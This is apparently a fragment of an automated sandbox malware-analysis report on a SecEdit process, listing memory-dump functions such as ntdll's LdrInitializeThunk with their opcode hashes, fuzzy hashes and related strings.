                                                                                                                                          • Opcode Fuzzy Hash: 451e2e50dd7bc68d8754550e1fb5930766215bd1a751b78adf0b3098a4cc169f
                                                                                                                                          • Instruction Fuzzy Hash: 4290022121180042E60079684D14F07040587D0383F51C519A1144554CCD6588616521
                                                                                                                                          Function 02F32CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 148 2f32cf0-2f32cfc LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 71c4113a97c0bb85b46434ed957634c3c357ba1b1a7e379e2ee92be5de4d40b4
                                                                                                                                          • Instruction ID: 23f00487f3389cfab13dd0caefb40f7e83c940f6eaf43f093a632ae873cd3af1
                                                                                                                                          • Opcode Fuzzy Hash: 71c4113a97c0bb85b46434ed957634c3c357ba1b1a7e379e2ee92be5de4d40b4
                                                                                                                                          • Instruction Fuzzy Hash: 71900221242041526945B5584904907440697E02C1791C416A2404950CC9769856E621
                                                                                                                                          Function 02F32C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 147 2f32c30-2f32c3c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: 6357233152614ad9afb7ccc9119352d27a4169b46e4896cdfc1b7987777bcedc
                                                                                                                                          • Instruction ID: b6619a0174e1f5c0df05b496c0186fb34f65a95082b79d054ee29712ee192843
                                                                                                                                          • Opcode Fuzzy Hash: 6357233152614ad9afb7ccc9119352d27a4169b46e4896cdfc1b7987777bcedc
                                                                                                                                          • Instruction Fuzzy Hash: 2090022921300002E58075585908A0B040587D1282F91D819A1005558CCD6588696321
                                                                                                                                          Function 02F32D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 149 2f32d10-2f32d1c LdrInitializeThunk
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: cd1a6c42b48b91de2cdb03bfa53b4ac063346889cd68f1cf8745fa66b64eae59
                                                                                                                                          • Instruction ID: ade0c1c6a1d74962db5bf814db71e4972d7606f548acfdc06fc101e9188036cf
                                                                                                                                          • Opcode Fuzzy Hash: cd1a6c42b48b91de2cdb03bfa53b4ac063346889cd68f1cf8745fa66b64eae59
                                                                                                                                          • Instruction Fuzzy Hash: 6890023120100413E51175584A04B07040987D02C1F91C816A1414558DDAA68952B121
                                                                                                                                          Function 02F32B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                          Download Yara Rule

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 136 2f32b2a-2f32b2f 137 2f32b31-2f32b38 136->137 138 2f32b3f-2f32b46 LdrInitializeThunk 136->138
                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: d27c1ea75690a2e2d36f9e6b04e32cc9ce266d99bd4c902b431ee9aa92db9ea1
                                                                                                                                          • Instruction ID: b4f6a9775c4bf8b80d7da94395ac8865f785670ac04b7a9a3c4c24c4696697bb
                                                                                                                                          • Opcode Fuzzy Hash: d27c1ea75690a2e2d36f9e6b04e32cc9ce266d99bd4c902b431ee9aa92db9ea1
                                                                                                                                          • Instruction Fuzzy Hash: 4EB09272D024C5CAEA12EB704B08B1B7E00ABD0781F26C466E3460681E8B78C491F276
                                                                                                                                          Function 026EAF53 Relevance: .0, Instructions: 18COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91632413260.00000000026C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_26c0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8e0b56a9ae10c9fb669f31624acc4627e640614d5f89512385a68cf046d6180e
                                                                                                                                          • Instruction ID: 3a2f36eac93f2ec4d2c9a654e06c3c5f6d3c15d028f772f4a7cab10a95dcb023
                                                                                                                                          • Opcode Fuzzy Hash: 8e0b56a9ae10c9fb669f31624acc4627e640614d5f89512385a68cf046d6180e
                                                                                                                                          • Instruction Fuzzy Hash: C3E08C3A200345EFE76EAF20C4424C87BB8FF11327752086EE09109632C7399252DF08

                                                                                                                                          Non-executed Functions

                                                                                                                                          Function 02F27550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F64592
                                                                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F64507
                                                                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F64530
                                                                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F6454D
                                                                                                                                          • Execute=1, xrefs: 02F6451E
                                                                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F64460
                                                                                                                                          • ExecuteOptions, xrefs: 02F644AB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                          • API String ID: 0-484625025
                                                                                                                                          • Opcode ID: a21d9fd76ff03382d9b24436f90d161e393d69cec38765a04f0b5120af8a7489
                                                                                                                                          • Instruction ID: fea75bfaefbe1f5c8efb4136b8b349b429cfe9ae904d946eb3312d233249f41a
                                                                                                                                          • Opcode Fuzzy Hash: a21d9fd76ff03382d9b24436f90d161e393d69cec38765a04f0b5120af8a7489
                                                                                                                                          • Instruction Fuzzy Hash: C751FB31A402296AEF21BB94DC56FBDB76DEF05384F0404E9D705AB280D7709E49CF50
                                                                                                                                          Function 02EF9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.91633331601.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.91633331601.0000000002FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_2ec0000_SecEdit.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: $$@
                                                                                                                                          • API String ID: 0-1194432280
                                                                                                                                          • Opcode ID: af563cf2662a9404012a2ea28282dcbe2bcb4116680bb01f3edab145b6ef7373
                                                                                                                                          • Instruction ID: 7ceddf4686fe0e4f19184ead908bceffdd855d947dba953192611a7847ff2fab
                                                                                                                                          • Opcode Fuzzy Hash: af563cf2662a9404012a2ea28282dcbe2bcb4116680bb01f3edab145b6ef7373
                                                                                                                                          • Instruction Fuzzy Hash: 46813C71D402699BDB35CF54CD45BEEB6B8AB08754F0041EAEB09B7281D7709E84CFA0